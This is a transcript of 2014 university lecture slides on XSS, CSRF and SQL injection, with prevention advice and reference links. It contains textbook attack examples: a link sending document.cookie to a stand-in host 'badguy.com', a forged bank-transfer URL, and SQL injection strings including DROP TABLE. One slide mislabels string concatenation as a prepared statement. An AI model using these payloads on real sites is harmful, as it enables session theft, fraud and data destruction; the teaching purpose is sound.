Presentation is loading. Please wait.

Presentation is loading. Please wait.

CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides.

Published byBeatrice Shelton Modified over 8 years ago

Similar presentations

Presentation on theme: "CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides."— Presentation transcript:

1 CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides

2 Overview Idea of XSS, CSRF and SQL injection is to violate the security of the Web Browser/Server system Inject content on web pages that trick users or Inject content on web pages that trick web servers Result is stolen resources or destruction of information

3 Web Based Attacks

4 Application Layer  Attacker sends attacks inside valid HTTP requests  Your custom code is tricked into doing something it should not  Security requires software development expertise, not signatures Network Layer  Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.  Security relies on signature databases Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Custom Code APPLICATION ATTACK Network Layer Application Layer Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Insider

5 Types of Web Attacks What kinds of Web attacks are popular? Inadequate validation of user input Named Attacks Below –Cross site scripting, XSS –Cross site request forgery, CSRF –SQL Injection

6 Cross-site Scripting (XSS) Cross-site scripting (XSS) computer security vulnerability typically found in web applications –“Allows code injection by malicious web users into web pages viewed by other users” Examples of such code include HTML code and client- side scripts An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as same origin policy for scripts –As of 2012 and 2013 cross-site scripting is number one web site problem

7 Same Origin Policy Web Scripts Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if the protocol, port (if one is specified), and host are the same for both pages http://www.w3.org/Security/wiki/Same_Origin_Policy URL Outcome Reason http://store.company.com/dir2/other.html Success http://store.company.com/dir/inner/another.html Success https://store.company.com/secure.html Failure Different protocol http://store.company.com:81/dir/etc.html Failure Different port http://news.company.com/dir/other.html Failure Different host

8 Example Websites XSS’d A hacker was able to insert JavaScript code into the Obama community blog section –The JavaScript would redirect the users to the Hillary Clinton website http://www.youtube.com/watch?v=pAS7kCgjkEw http://www.crn.com/news/security/207401353/ obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here http://www.xssed.com/archive Example of XSS Attack http://www.acunetix.com/websitesecurity/xss/

9 9 Cross Site Scripting (XSS)‏ Recall … –Scripts embedded in web pages run in browsers –Scripts can access cookies Get private information –Manipulate page objects Controls what users see –Scripts controlled by same-origin policy How could XSS occur? –Web applications often take user inputs and use them as part of webpage

10 XSS Example User input is echoed into HTML response Example: Search field –http://victim.com/search.php ? term = apple search.php responds with this page: Search Results Results for :... Is this exploitable?

11 XSS Example Attacker’s Bad input Problem: No validation of input term Consider this link: http://victim.com/search.php ? term = window.open( “http://badguy.com?cookie = ” + document.cookie ) What if user clicks on this link? 1.Browser goes to victim.com/search.php 2.Victim.com returns Results for … Browser executes script: Sends badguy.com cookie for victim.com

12 XSS Results of this Attack Why would user click on such a link? –Phishing email in webmail client (e.g. gmail). –Link in doubleclick banner ad –… many, many ways to fool user into clicking What if badguy.com gets cookie for victim.com ? –Cookie can include session authentication for victim.com Or other data intended only for victim.com  Violates same origin policy

13 XSS Example However, there is a great site with many cut and paste opportunities to try this out A complete cheat sheet for XSS: http://ha.ckers.org/xss.html

14 Preventing XSS Escape all user input when it is displayed –Escaping converts the output to harmless html entities becomes <script> but still displayed as –Methods: OWASP ESAPI Java Standard Tag Library (JSTL) OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

15 Preventing XSS Security Expert Coding Recommendations http://www.jtmelton.com/tag/cross-site-scripting/.NET: use the Microsoft Anti-XSS Library http://msdn.microsoft.com/en-us/security/aa973814.aspx

16 XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default –Will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust –Must first enable Javascript in Firefox http://noscript.net/features

17 Cross Site Request Forgery CSRF

18 What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf Change victim's e-mail address, Change home address, or Change password, or purchase something

19 CSRF Attack - Background W W h e n y o u a u t h e n t i c a t e t o W e b a p p l i c a t i o n, S e r v e r p r o v i d e s y o u w i t h a s e s s i o n c o o k i e T B r o w s e r r e m e m b e r s s e s s i o n c o o k i e n a m e, v a l u e a n d d o m a i n i t c a m e f r o m f o r f u r t h e r u s e –From this point on, every request initiated from browser to the application will contain the session identifier for the particular domain –The browser automatically supplies this information so the developers don’t have to do it themselves

20 3 2 Attacker sets the trap on some website on the internet (or simply via an e-mail) 1 Vulnerable site sees legitimate request from victim and performs the action requested tag loaded by browser – sends GET request (including credentials) to vulnerable site Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Hidden tag contains attack against vulnerable site Application with CSRF vulnerability While logged into vulnerable site,victim views attacker site

21 Cross Site Request Forgery (CSRF)‏ C C r o s s S i t e R e q u e s t F o r g e r y, a l s o X S R F o r C r o s s S i t e R e f e r e n c e F o r g e r y – Works by exploiting trust of site for the user – In the case of XSS, the user is the victim – In the case of CSRF, the user is an accomplice. E x a m p l e : h t t p : / / s i t e / s t o c k s ? b u y = 1 0 0 & s t o c k = e b a y –Allows specific actions to be performed when requested If a user is logged into site and an attacker tricks their browser into making a request to one of these task urls, then task is performed for logged in user … but the user didn’t intend to do it

22 Dangers of CSRF Most of the functionality allowed by website can be performed by an attacker utilizing CSRF What does this mean for victims? –This could include Posting content to a message board, Subscribing to an online newsletter, Performing stock trades, using a shopping cart, or Even sending an e-card

23 CSRF More Details The most popular ways to execute CSRF attacks Using a HTML image tag, or JavaScript image object –An attacker will embed these into an email or website so when user loads page or email, they perform a web request to any URL of attackers liking Examples follow

24 CSRF Code Examples HTML Methods IMG SRC SCRIPT SRC IFRAME SRC JavaScript Methods 'Image' Object var foo = new Image(); foo.src = "http://host/?command";

25 Another CSRF Example Say, online banking site performs a transfer of funds action by calling a URL such as: http://bigsafebank.com/ transfer.do?acct=ATTACKER&amount=1000 –This URL will transfer $1000 from a victim’s account into the attacker’s account if the victim is logged into their account within BigSafeBank website

26 CSRF Example Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML email with a tag such as: When a victim views this HTML email, Will see an error indicating that image could not be loaded, But browser still submits transfer request to bigsafebank.com without requiring any further interaction from the user

27 CSRF Example Crazy part is … Even though the image was rendered unsuccessfully, Using tag, an automatic http request was made that contained the victim's credentials, Ie. Session Cookie Allowing the server to perform the malicious action

28 CSRF Why Does it Happen A web application's vulnerability to CSRF is due to the following conditions: –The use of certain HTML tags will result in automatic HTTP Request execution. –Our browsers have no way of telling if a resource referenced by an tag is a legitimate image –The loading of an image will happen regardless of where that image is located.

29 CSRF Why Does it Happen More reasons why... –Code within web application performs security sensitive operations in response to requests without validation of user –GET requests are especially vulnerable to this type of attack, but POST requests are not immune

30 Fixing CSRF with CSRF Guard http://www.owasp.org/index.php/How_CSRFGuard_Works The Open Web Application Security Project (OWASP)‏ Developed a tool, CSRF Guard to implement session-token idea to thwart CSRF attacks When user first visits site, application will generate and store a session specific unique request token This session specific unique request token is then placed in each form and link of HTML response, ensuring that this value will be submitted with the next request For each subsequent request, application must verify existence of unique token parameter and compare its value to that of value stored in user's session

31 SQL Injection

32 Very Common vulnerability (~71 attacks/hour ) Exploits Web apps Use Databases –Poorly validate user input for SQL string literal escape characters, e.g., ' –Do not have strongly screened user input Example – escape characters "SELECT * FROM users WHERE name = '" + userName + "';" If userName is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users ⇒ displays all users

33 SQL Injection Example – Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" –If programmer doesn’t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users –SQL evaluates to SELECT * FROM userinfo WHERE id=1;DROP TABLE users; – Result of this query? –Users table is deleted

34 Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can –Delete, alter or create data –Grant direct access to the hacker –Escalate privileges and even take over the OS

35 Preventing SQL injection Use Prepared Statements –$id=1234 –“select * from accounts where id = “ + $id Next one is safer – More exact –“select * from accounts where id =1234” Validate input –Strong typing If the id parameter is a number, try parsing it into an integer –Business logic validation Escape questionable characters – ticks, --, semi-colon, brackets

36 Summary Experts suggest, –Internet Security model is completely flawed –Made worse by Web 2.0 –As developers … we can at least ensure our code is not broken –As users … we have far less control – Browser security !!!!

37 References CSRF Links –CGI FAQ on Cross Site Request Forgery (CSRF)‏ http://www.cgisecurity.com/articles/csrf-faq.shtml –Art of Software Security Assessment – Same Origin http://taossa.com/index.php/2007/02/08/same-origin-policy/ –OWASP CSRF Site http://www.owasp.org/index.php/CSRF –MSDN Article on CSRF Explained http://msdn.microsoft.com/en-us/testing/cc664492.aspx –Wikipedia http://en.wikipedia.org/wiki/Cross- site_request_forgery

38 References XSS http://www.cgisecurity.com/articles/xss-faq.shtml http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1. html http://www.cgisecurity.com/articles/xss-faq.shtml http://msdn.microsoft.com/en-us/testing/cc664492.aspx http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

39 References SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ SQL Prevention http://www.marcofolio.net/features/how_you_can_prevent_an_sql_i njection.html SQL Attacks from UnixWiz http://www.unixwiz.net/techtips/sql-injection.html OWASP SQL Injection https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat _Sheet

40 End

Download ppt "CSCD 303 Essential Computer Security Winter 2014 Lecture 12 – XSS, SQL Injection and CRSF Reading: See links - End of Slides."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-site Request Forgery (CSRF) Attacks

Cross-site Request Forgery (CSRF) Attacks
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Exploits: XSS, SQLI, Buffer Overflow

Exploits: XSS, SQLI, Buffer Overflow
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Similar presentations

Ads by Google